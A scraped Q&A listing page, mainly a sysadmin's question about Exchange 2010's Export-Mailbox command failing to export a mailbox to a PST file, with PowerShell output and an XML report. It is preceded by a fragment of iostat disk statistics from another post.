Blk_wrtn/s Blk_read Blk_wrtn sda 81.00 0.00 840.00 0 840 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 81.00 0.00 840.00 0 840 avg-cpu: %user %nice %system %iowait %steal %idle 55.18 0.00 5.81 0.44 0.00 38.58 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 317.00 0.00 105632.00 0 105632 sda1 0.00 0.00 0.00 0 0 sda2 224.00 0.00 104672.00 0 104672 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 93.00 0.00 960.00 0 960 avg-cpu: %user %nice %system %iowait %steal %idle 55.38 0.00 7.63 0.00 0.00 36.98 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 74.00 0.00 800.00 0 800 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 74.00 0.00 800.00 0 800 avg-cpu: %user %nice %system %iowait %steal %idle 56.43 0.00 7.80 0.00 0.00 35.77 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 72.00 0.00 784.00 0 784 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 72.00 0.00 784.00 0 784 avg-cpu: %user %nice %system %iowait %steal %idle 54.87 0.00 6.49 0.00 0.00 38.64 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 80.20 0.00 855.45 0 864 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 80.20 0.00 855.45 0 864 avg-cpu: %user %nice %system %iowait %steal %idle 57.22 0.00 5.69 0.00 0.00 37.09 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 33.00 0.00 432.00 0 432 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 33.00 0.00 432.00 0 432 avg-cpu: %user %nice %system %iowait %steal %idle 56.03 0.00 7.93 0.00 0.00 36.04 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 41.00 0.00 560.00 0 560 sda1 0.00 0.00 0.00 0 0 sda2 2.00 0.00 88.00 0 88 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 39.00 0.00 472.00 0 472 avg-cpu: %user %nice %system %iowait %steal %idle 55.78 0.00 5.13 0.00 0.00 39.09 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 29.00 0.00 392.00 0 392 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 29.00 0.00 392.00 0 392 avg-cpu: %user %nice %system %iowait %steal %idle 53.68 0.00 8.30 0.06 0.00 37.95 Device: tps Blk_read/s Blk_wrtn/s Blk_read Blk_wrtn sda 78.00 0.00 4280.00 0 4280 sda1 0.00 0.00 0.00 0 0 sda2 0.00 0.00 0.00 0 0 sda3 0.00 0.00 0.00 0 0 sda4 0.00 0.00 0.00 0 0 sda5 78.00 0.00 4280.00 0 4280

    Read the article

  • Exchange 2010 PST-Export fails

    - by Chake
    I'm horribly failing at exporting Exchnange Mailboxes to PST files. Perhaps You are able to help me? The System I'm running some legacy machines here. The one I'm currently working on (CurrentDC) is a Windows 2008 R2 Server with Exchange 2010 on it. Exchange seems to be poorly patched: [PS] C:\>get-exchangeserver Name Site ServerRole Edition AdminDisplayVersion ---- ---- ---------- ------- ------------------- OldDC None Enterprise Version 6.5 (Bui... CurrentDC company.local Mailbox,... Enterprise Version 14.0 (Bu... The Problem After some trouble I managed to get the Export-Mailbox command run: [PS] C:\>Export-Mailbox -Identity marco -PSTFolderPath C:\ExchangeExport According to several Websites that seems to be the right command to export the mailbox of the user "marco" to "C:\ExchangeExport". But after running the command an error occurs (I'm sorry, it is the german version of Windows 2008 - but if you translate Fehler with error and Vorgang with process you should be prepared enough to go ;)) [PS] C:\Export-Mailbox -Identity marco -PSTFolderPath C:\ExchangeExport Fehler für Marco S ([email protected]). Ursache: Fehler bei diesem Vorgang., Fehlercode: -2147467259. + CategoryInfo : InvalidOperation: (0:Int32) [Export-Mailbox], RecipientTaskException + FullyQualifiedErrorId : 2317FD3A,Microsoft.Exchange.Management.RecipientTasks.ExportMailbox RunspaceId : 44415363-371e-44a1-a682-61e6a9b90c86 Identity : company.local/Company User/Marco S DistinguishedName : CN=Marco S,OU=Company User,DC=company,DC=local DisplayName : Marco S Alias : marco LegacyExchangeDN : /o=Erste Organisation/ou=Erste administrative Gruppe/cn=Recipients/cn=marco PrimarySmtpAddress : [email protected] SourceServer : CurrentDC.company.local SourceDatabase : Mailbox Database 0279110169 SourceGlobalCatalog : CurrentDC SourceDomainController : TargetGlobalCatalog : CurrentDC TargetDomainController : TargetMailbox : TargetServer : TargetDatabase : MailboxSize : 0 B (0 bytes) IsResourceMailbox : False SIDUsedInMatch : SMTPProxies : SourceManager : SourceDirectReports : SourcePublicDelegates : SourcePublicDelegatesBL : SourceAltRecipient : SourceAltRecipientBL : SourceDeliverAndRedirect : MatchedTargetNTAccountDN : IsMatchedNTAccountMailboxEnabled : MatchedContactsDNList : TargetNTAccountDNToCreate : TargetManager : TargetDirectReports : TargetPublicDelegates : TargetPublicDelegatesBL : TargetAltRecipient : TargetAltRecipientBL : TargetDeliverAndRedirect : Options : Default SourceForestCredential : TargetForestCredential : TargetFolder : PSTFilePath : C:\ExchangeExport\marco.pst RecoveryMailboxGuid : RecoveryMailboxLegacyExchangeDN : RecoveryMailboxDisplayName : RecoveryDatabaseGuid : StandardMessagesDeleted : 0 AssociatedMessagesDeleted : 0 DumpsterMessagesDeleted : 0 MoveType : ExportToPST MoveStage : Validation StartTime : 05.10.2012 13:55:46 EndTime : 05.10.2012 13:55:46 StatusCode : -2147467259 StatusMessage : Fehler bei diesem Vorgang. ReportFile : C:\Program Files\Microsoft\Exchange Server\V14\Logging\MigrationLogs\export-Mailbox20121005-135545-8170000.xml ServerName : CurrentDC.company.local What I have done Well, I must say I'm quite clueless. I was wondering why MailboxSize is 0 - so I checked it: [PS] C:\>Get-MailboxStatistics marco | ft DisplayName, TotalItemSize, ItemCount DisplayName TotalItemSize ItemCount ----------- ------------- --------- Marco S 473 MB (496,011,572 bytes) 4173 Well, this i not 0 bytes - but I don't know what to do with this information. Also I had a look at the ReportFile mentioned in the output: <?xml version="1.0"?> <export-Mailbox> <TaskHeader> <RunningAs>NT-AUTORITÄT\SYSTEM</RunningAs> <Name>export-Mailbox</Name> <Type>ExportToPST</Type> <MaxBadItems>0</MaxBadItems> <Version>14.0.639.21</Version> <StartTime>10.05.2012 14:19:12</StartTime> <Options Identity="marco" PSTFolderPath="C:\ExchangeExport" DeleteContent="False" DeleteAssociatedMessages="False" GlobalCatalog="CurrentDC" MaxThreads="4" BadItemLimit="0" ValidateOnly="False" IncludeFolders="" ExcludeFolders="" StartDate="01.01.0001 00:00:00" EndDate="31.12.9999 23:59:59" SubjectKeywords="" ContentKeywords="" AllContentKeywords="" AttachmentFilenames="" SenderKeywords="" RecipientKeywords="" Locale="" /> </TaskHeader> <TaskDetails> <Item MailboxName="Marco S"> <Source> <Identity>company.local/Company User/Marco S</Identity> <DistinguishName>CN=Marco Sc,OU=Company User,DC=company,DC=local</DistinguishName> <DisplayName>Marco S</DisplayName> <Alias>marco</Alias> <LegacyExchangeDN>/o=Erste Organisation/ou=Erste administrative Gruppe/cn=Recipients/cn=marco</LegacyExchangeDN> <PrimarySmtpAddress>[email protected]</PrimarySmtpAddress> <SourceServer>CurrentDC.company.local</SourceServer> <SourceDatabase>Mailbox Database 0279110169</SourceDatabase> <IsResourceMailbox>False</IsResourceMailbox> <SourceGlobalCatalog>CurrentDC</SourceGlobalCatalog> </Source> <Target> <PSTFilePath>C:\ExchangeExport\marco.pst</PSTFilePath> </Target> <MailboxSize>0 B (0 bytes)</MailboxSize> <Duration>00:00:00</Duration> <Result IsWarning="False" ErrorCode="-2147467259">Fehler bei diesem Vorgang.</Result> </Item> </TaskDetails> <TaskFooter> <EndTime>10.05.2012 14:19:13</EndTime> <TotalSize>0 B (0 bytes)</TotalSize> <StandardMessagesDeleted>0</StandardMessagesDeleted> <AssociatedMessagesDeleted>0</AssociatedMessagesDeleted> <DumpsterMessagesDeleted>0</DumpsterMessagesDeleted> <Result ErrorCount="1" CompletedCount="0" WarningCount="0" /> </TaskFooter> </export-Mailbox> Do you have any clue? <UPDATE> Regarding to the answer from downthepub I tried to use UNC paths - no change. Also I tried installing the management tools to a client and run the scripts from there - no way, too. </UPDATE> Thanks a lot for reading this mess!

    Read the article

< Previous Page | 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086  | Next Page >